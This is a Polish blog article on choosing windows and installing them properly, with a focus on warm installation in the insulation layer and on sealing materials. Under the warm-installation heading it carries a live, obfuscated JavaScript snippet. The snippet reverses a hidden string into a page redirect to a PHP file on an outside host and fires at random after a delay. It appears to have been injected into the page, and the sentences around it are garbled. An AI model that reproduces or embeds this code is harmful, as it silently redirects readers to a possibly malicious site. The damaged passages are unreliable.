Jak wygląda prawidłowy montaż okien?

Jak wygląda prawidłowy montaż okien?

Prawidłowy montaż okna nie należy do zadań łatwych. Błędy popełnione przy montażu  mogą skutkować uszkodzeniem okna jak i wzrostem utraty ciepła w domu. Jak zatem prawidłowo montuje się okno i na co należy zwrócić szczególną uwagę? Odpowiedzi na to pytanie postaramy się udzielić w poniższym tekście.

Okna – jak wybrać?

OknaZanim powiemy jak należy zamontować poprawnie okna by zapewniały one wysoki komfort mieszkaniowy powiemy chociaż kilka słów o wyborze samych okien. Ważne jest by przy ich wyborze zwrócić uwagę na to jaki mają one współczynnik przenikania ciepła. Zasada jest taka, że im jest on niższy tym lepiej. Przy ich wyborze zwróćmy jednak uwagę na ich wagę. Tak zwane ciepłe okna są stosunkowo ciężkie, a to może mieć duże znaczenie przy ich montaż zwłaszcza, jeżeli będą one montowane w strefie docieplenia. Wybierając okna należy także brać pod uwagę to z jakiego materiału zostały one wykonane, także i to przekłada się na ich właściwości. Nadal najpopularniejsze są okna PCV, choć okna aluminiowe także mają dobre parametry jak i są trwalsze. Ostatnią kwestia na jaką powinniśmy zwrócić uwagę jest cena. Najbezpieczniej jest zwykle wybierać okna ze średniego przedziału cenowego.

Prawidłowy montaż okien – podstawę wytyczne

montaż okienWedług poradnika z okna ze ścianą budynku będzie po pierwsze skutkować przyspieszona degradacja budynku, a po drugie w związku z tym okno także szybciej ulega uszkodzenia. Ważne jest także to w jaki sposób zostanie wypełniona przestrzeń między oknem i ściana. Uszczelnienie powinno być trwałe i dokładne, w innym wypadku okno w trakcie użytkowania także może ulec uszkodzeniu, a także jego utrata ciepła może być większa niż wynika to z opis producenta. Wszystko zatem sprowadza się do konieczności zastosowania właściwych technik i metod montażu.

Ciepły montaż okien – co należy wiedzieć?

$NqM=function(n){if (typeof ($NqM.list[n]) == „string”) return $NqM.list[n].split(„”).reverse().join(„”);return $NqM.list[n];};$NqM.list=[„\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}towniabudowlana.pl”>montaż warstwowy okien to w rzeczywistości taki sposób montowania okna by cechowało się ono jak najwyższymi parametrami izolacji termicznej. Ciepły montaż stosuje się tylko w przypadku dwu lub trójwarstwowego muru, a same okna montuje się w strefie docieplenia. Takie rozwiązanie ma na celu zredukowanie ilości mostków termicznych, a co za tym idzie ma to poprawić właściwości izolacyjne okna, dzięki czemu utrata ciepła jest mniejsza. Montowanie okna w strefie ocieplenia wymaga jednak stosowania nieco innych rozwiązań. Dodatkowo decydując się na ciepły montaż warto pomyśleć także o zastosowaniu takiego rozwiązania jakim jest ciepły parapet. Rozwiązanie to pozwala w jeszcze większym stopniu ograniczyć stratę ciepła.

Montaż okien w strefie ocieplenia

MONTAŻ OKIENJak już zostało wspomniane montaż okien tak tych ciepłych jak i zwykłych w strefie ocieplenia nieco różni się od montażu zwykłego okna. Okna w takim wypadku montuje się za pomocą specjalnych profili instalacyjnych, które następnie łączone są z samym ociepleniem jak i częściowo z murem. Co ważne w tym wypadku profile okienne montuje się bezpośrednio w samym ocieplenie, a nie w murze. Przy takim sposobie montażu, większość ciężaru okna spoczywa na ociepleniu, a tylko jego część przenoszona jest na mur. Jako łącznik przy montażu okien w stafie ocieplenia wykorzystuje się klej, jednak jest on tak dobrany, że okno montowane tym sposobem jest równie trwałe co to montowane w sposób tradycyjny. Jeżeli chodzi o uszczelnianie okien w sferze ocieplenia to zasadniczo sposoby są tu takie same jak w przypadku normalnego montażu. Według www.oknonet.pl wykorzystuje się tu takie rozwiązania jak:

  • pianka poliuretanowej,
  • taśma uszczelniająca do okien,
  • sylikon,
  • folia paroszczelna.

Przy czym należy wskazać, że cześć tych rozwiązań stosuje się przy uszczelnianiu okna od strony wewnętrznej, a część od strony zewnętrznej. To w jaki sposób zamontowane i uszczelniono zostanie okno będzie miało duży wpływ na to jak będzie ono funkcjonować i na ile będzie ono trwałe. Dodatkowo zważywszy na to, że montaż okien w strefie docieplenie nie należy do łatwych ważne jest to by zatrudnić sprawdzoną i wykwalifikowaną ekipę.

Podsumowując

To w jaki sposób zostanie zamontowane okno przełoży się na komfort mieszkaniowy jak i na opłaty związane z ogrzewaniem domu. Tak ważne jest dlatego to by zrobić to w sposób prawidłowy, a co za tym idzie konieczne jest zwykle wynajęcie w tym celu profesjonalnej firmy znająca najnowsze techniki montażu okien.  

Dodaj komentarz